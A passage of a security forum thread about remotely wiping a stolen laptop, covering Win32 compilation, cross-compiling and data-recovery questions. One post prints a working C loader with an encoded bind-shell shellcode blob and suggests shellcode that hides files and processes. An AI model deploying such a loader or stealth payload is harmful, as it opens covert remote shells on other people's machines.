
Thread: Sanitising a computer remotely

  1. #21
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    15

    Default

    Quote Originally Posted by Virchanza View Post
    What exactly does that machine code do? I don't suppose you have the original source code from which it was produced? If it opens a port of 4444 then which daemon is listening? And how do you interact with that daemon to get it to execute code?

    Another problem is that the victim machine will always be behind a NAT-router, and also the firewall on the computer itself will probably block the traffic.

    @pureh@te:
    I dunno if you're being sarcastic but here's an explanation nonetheless... Some C compilers offer "compiler extensions" which aren't a part of the C standard; this particular program doesn't contain any compiler extensions, it just won't compile because you don't have the necessary header files and object files for the Win32 API.
    I am no expert either, but from the comment in his post where he says you can go to metasploit and use any shellcode I like, well, I can use any shellcode I like.

  2. #22
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Quote Originally Posted by Virchanza View Post
    What exactly does that machine code do? I don't suppose you have the original source code from which it was produced? If it opens a port of 4444 then which daemon is listening? And how do you interact with that daemon to get it to execute code?

    Another problem is that the victim machine will always be behind a NAT-router, and also the firewall on the computer itself will probably block the traffic.

    @pureh@te:
    I dunno if you're being sarcastic but here's an explanation nonetheless... Some C compilers offer "compiler extensions" which aren't a part of the C standard; this particular program doesn't contain any compiler extensions, it just won't compile because you don't have the necessary header files and object files for the Win32 API.
    Virchanza, no, I was not being sarcastic. My C is pretty poor and I was honestly asking the question. I can't figure out what package I need which contains the win32 libs for my system.

  3. #23
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    Quote Originally Posted by pureh@te View Post
    Virchanza, no, I was not being sarcastic. My C is pretty poor and I was honestly asking the question. I can't figure out what package I need which contains the win32 libs for my system.
    The laptop that was stolen has Windows on it, so Compaq posted code to be compiled to an executable file that will run on Windows.

    Win32 refers to "Microsoft Windows 32-Bit", you won't be able to get the library for Linux. (And thankfully so).

    The Win32 Application Programming Interface (API for short), is the set of functions that a Win32 function can use to do stuff in Windows. For instance, if I wanted to make a message box appear in Windows, I could call the "MessageBoxW" function which is a part of the Win32 API.
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

  4. #24
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default

    There's probably a way to get dban to run on boot. It runs in memory, so once it's running it won't need the drive anymore. Though it's already been said, the info has probably been pulled already.
    Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69

  5. #25
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Quote Originally Posted by Virchanza View Post
    The laptop that was stolen has Windows on it, so Compaq posted code to be compiled to an executable file that will run on Windows.

    Win32 refers to "Microsoft Windows 32-Bit", you won't be able to get the library for Linux. (And thankfully so).

    The Win32 Application Programming Interface (API for short), is the set of functions that a Win32 function can use to do stuff in Windows. For instance, if I wanted to make a message box appear in Windows, I could call the "MessageBoxW" function which is a part of the Win32 API.
    I understand all of that just fine, but I was under the impression that C code with winsock2.h and windows.h could still be compiled with GCC in order to run on a Windows machine. What I mean is, if I only had a *nix box and I wanted to compile this to upload to a Windows box, is there no way to do that in GCC? I understand it's a Windows executable.

  6. #26
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    Quote Originally Posted by pureh@te View Post
    I understand all of that just fine, but I was under the impression that C code with winsock2.h and windows.h could still be compiled with GCC in order to run on a Windows machine. What I mean is, if I only had a *nix box and I wanted to compile this to upload to a Windows box, is there no way to do that in GCC? I understand it's a Windows executable.
    OK, I'm with you

    What you're referring to is known as "cross-compilation". Cross-compilation is where you use Computer Type A to compile a program that will run on Computer Type B. So for instance, if you compiled a Windows program using a compiler on a Linux machine, that would be cross-compilation.

    The only cross-compilation I've ever done is using my laptop to compile a program for an 8-Bit microcontroller :P

    Here's an excerpt from Wikipedia http://en.wikipedia.org/wiki/Cross-compiling:

    "GCC, a free software collection of compilers, can be set up to cross compile. It supports many platforms and languages. However, due to limited volunteer time and the huge amount of work it takes to maintain working cross compilers, in many releases some of the cross compilers are broken."
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

  7. #27
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    I understand all of that just fine, but I was under the impression that C code with winsock2.h and windows.h could still be compiled with GCC in order to run on a Windows machine. What I mean is, if I only had a *nix box and I wanted to compile this to upload to a Windows box, is there no way to do that in GCC? I understand it's a Windows executable.
    The last line that loads the shellcode should (haven't tested) run in Linux with gcc. The couple of lines above don't need to be there, as the shellcode from metasploit will initialise the sockets; but hiding the window with the top two lines is Windows only, and I don't know the code for Linux (but they don't need to be there). Use shellcode for Linux and it should work.

    linux code
    Code:
     
    #include <stdio.h>
    
    
    unsigned char bindcode[] =                  ////////////////get linux shell code
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
    "\x25\x78\x47\x83\xeb\xfc\xe2\xf4\x32\x4f\x93\x0a\x26\xdc\x87\xb8"
    "\x31\x45\xf3\x2b\xea\x01\xf3\x02\xf2\xae\x04\x42\xb6\x24\x97\xcc"
    "\x81\x3d\xf3\x18\xee\x24\x93\x0e\x45\x11\xf3\x46\x20\x14\xb8\xde"
    "\x62\xa1\xb8\x33\xc9\xe4\xb2\x4a\xcf\xe7\x93\xb3\xf5\x71\x5c\x6f"
    "\xbb\xc0\xf3\x18\xea\x24\x93\x21\x45\x29\x33\xcc\x91\x39\x79\xac"
    "\xcd\x09\xf3\xce\xa2\x01\x64\x26\x0d\x14\xa3\x23\x45\x66\x48\xcc"
    "\x8e\x29\xf3\x37\xd2\x88\xf3\x07\xc6\x7b\x10\xc9\x80\x2b\x94\x17"
    "\x31\xf3\x1e\x14\xa8\x4d\x4b\x75\xa6\x52\x0b\x75\x91\x71\x87\x97"
    "\xa6\xee\x95\xbb\xf5\x75\x87\x91\x91\xac\x9d\x21\x4f\xc8\x70\x45"
    "\x9b\x4f\x7a\xb8\x1e\x4d\xa1\x4e\x3b\x88\x2f\xb8\x18\x76\x2b\x14"
    "\x9d\x76\x3b\x14\x8d\x76\x87\x97\xa8\x4d\x7c\x05\xa8\x76\xf1\xa6"
    "\x5b\x4d\xdc\x5d\xbe\xe2\x2f\xb8\x18\x4f\x68\x16\x9b\xda\xa8\x2f"
    "\x6a\x88\x56\xae\x99\xda\xae\x14\x9b\xda\xa8\x2f\x2b\x6c\xfe\x0e"
    "\x99\xda\xae\x17\x9a\x71\x2d\xb8\x1e\xb6\x10\xa0\xb7\xe3\x01\x10"
    "\x31\xf3\x2d\xb8\x1e\x43\x12\x23\xa8\x4d\x1b\x2a\x47\xc0\x12\x17"
    "\x97\x0c\xb4\xce\x29\x4f\x3c\xce\x2c\x14\xb8\xb4\x64\xdb\x3a\x6a"
    "\x30\x67\x54\xd4\x43\x5f\x40\xec\x65\x8e\x10\x35\x30\x96\x6e\xb8"
    "\xbb\x61\x87\x91\x95\x72\x2a\x16\x9f\x74\x12\x46\x9f\x74\x2d\x16"
    "\x31\xf5\x10\xea\x17\x20\xb6\x14\x31\xf3\x12\xb8\x31\x12\x87\x97"
    "\x45\x72\x84\xc4\x0a\x41\x87\x91\x9c\xda\xa8\x2f\x3e\xaf\x7c\x18"
    "\x9d\xda\xae\xb8\x1e\x25\x78\x47";
    
    
    
    int main()
    {
    ((void (*)(void)) &bindcode)();   ////////////the program will stay running when it loads bindcode, use shellcode that will hide files and process.
    }
    Another note: if you set this up with a socket listener, you could ask the attacker to send shellcode and get it to run larger shellcode, say if you can only use a small shellcode with an exploit.

  8. #28
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Cool. Thanks for clearing it up.

  9. #29
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    12

    Default

    Hi All,

    I am not an expert in this area, but simple drive wipes might still be recoverable using disk forensic tools. Would it be feasible to encrypt the data in place and destroy the crypto key as an alternative?

    Just an idea.

  10. #30
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by S7oneGhos7 View Post
    Hi All,

    I am not an expert in this area, but simple drive wipes might still be recoverable using disk forensic tools. Would it be feasible to encrypt the data in place and destroy the crypto key as an alternative?

    Just an idea.
    Since the data was already stored once in plain, unencrypted format, it would be just as recoverable after this as after simply being destroyed in the first place. Or actually, that is incorrect: as you are suggesting to simply destroy the encryption key, the actual data would still remain, and you would in addition have the option to brute-force the key to recover the data.
    -Monkeys are like nature's humans.
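An added example (not code from the thread) that models the exchange in the last two posts: encrypting the live file in place and then destroying a random 256-bit key makes that copy unrecoverable, but any copy written in the clear elsewhere on the disk is untouched by the operation. The cipher is an HMAC-SHA256 counter-mode stand-in for a real disk cipher such as AES-XTS, chosen only so the model runs with the standard library; the disk, sector layout and marker string are constructed.

```python
import hashlib
import hmac
import os

SECTOR = 64      # bytes per simulated sector (constructed size)
NSECTORS = 8

def keystream(key: bytes, sector_no: int, length: int) -> bytes:
    """Counter-mode keystream per sector, built from HMAC-SHA256 (stand-in for AES-XTS)."""
    out, ctr = b"", 0
    while len(out) < length:
        block = sector_no.to_bytes(8, "big") + ctr.to_bytes(4, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        ctr += 1
    return out[:length]

def xor_sector(key: bytes, sector_no: int, data: bytes) -> bytes:
    """Encrypt or decrypt one sector (XOR with the keystream is its own inverse)."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, sector_no, len(data))))

def write_plain(disk: list, sector_no: int, data: bytes) -> None:
    disk[sector_no] = data.ljust(SECTOR, b"\0")

def encrypt_in_place(disk: list, key: bytes, sectors: list) -> None:
    """What a 'turn encryption on later' tool does: rewrite only the sectors it knows about."""
    for s in sectors:
        disk[s] = xor_sector(key, s, disk[s])

def plaintext_remnants(disk: list, marker: bytes) -> list:
    """Forensic-style sweep: which sectors still hold the recognisable plaintext?"""
    return [i for i, sec in enumerate(disk) if marker in sec]

def scenario() -> dict:
    marker = b"CONFIDENTIAL-CLIENT-LIST"       # constructed sensitive content
    disk = [bytes(SECTOR)] * NSECTORS
    write_plain(disk, 2, marker)               # the live file, written in the clear long ago
    write_plain(disk, 5, marker)               # stale copy: old version / unallocated space
    key = os.urandom(32)                       # 256 random bits: not brute-forceable
    encrypt_in_place(disk, key, sectors=[2])   # the tool only sees the live file
    live_hidden = marker not in disk[2]
    del key                                    # "destroy the key": sector 2 is now unrecoverable
    return {"live_hidden": live_hidden, "remnants": plaintext_remnants(disk, marker)}

if __name__ == "__main__":
    print(scenario())   # {'live_hidden': True, 'remnants': [5]}
```

The sweep finds sector 5 regardless of what happens to the key, which is the point Post #30 makes; the brute-force concern applies only when the key is derived from something guessable rather than from 256 random bits.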
